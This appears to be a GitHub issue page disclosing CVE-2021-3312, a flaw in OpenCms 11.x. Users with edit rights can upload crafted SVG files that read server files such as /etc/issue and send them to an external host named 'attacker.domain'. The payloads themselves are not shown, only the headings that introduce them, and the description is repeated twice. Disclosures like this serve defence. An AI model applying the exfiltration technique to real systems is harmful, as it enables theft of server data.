You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
In OpenCms 11.x, it is possible for logged in users with edit permissions to exfiltrate data from the server's file system and send it to an external server by uploading specially crafted SVGs files.
Example in which the first line of /etc/issue is read and sent to the server "attacker.domain":
In OpenCms 11.x, it is possible for logged in users with edit permissions to exfiltrate data from the server's file system and send it to an external server by uploading specially crafted SVGs files.
Example in which the first line of /etc/issue is read and sent to the server "attacker.domain":
The SVG file to upload:
The evil.xml file served by the external server "attacker.domain":
CVE ID: CVE-2021-3312.
The text was updated successfully, but these errors were encountered: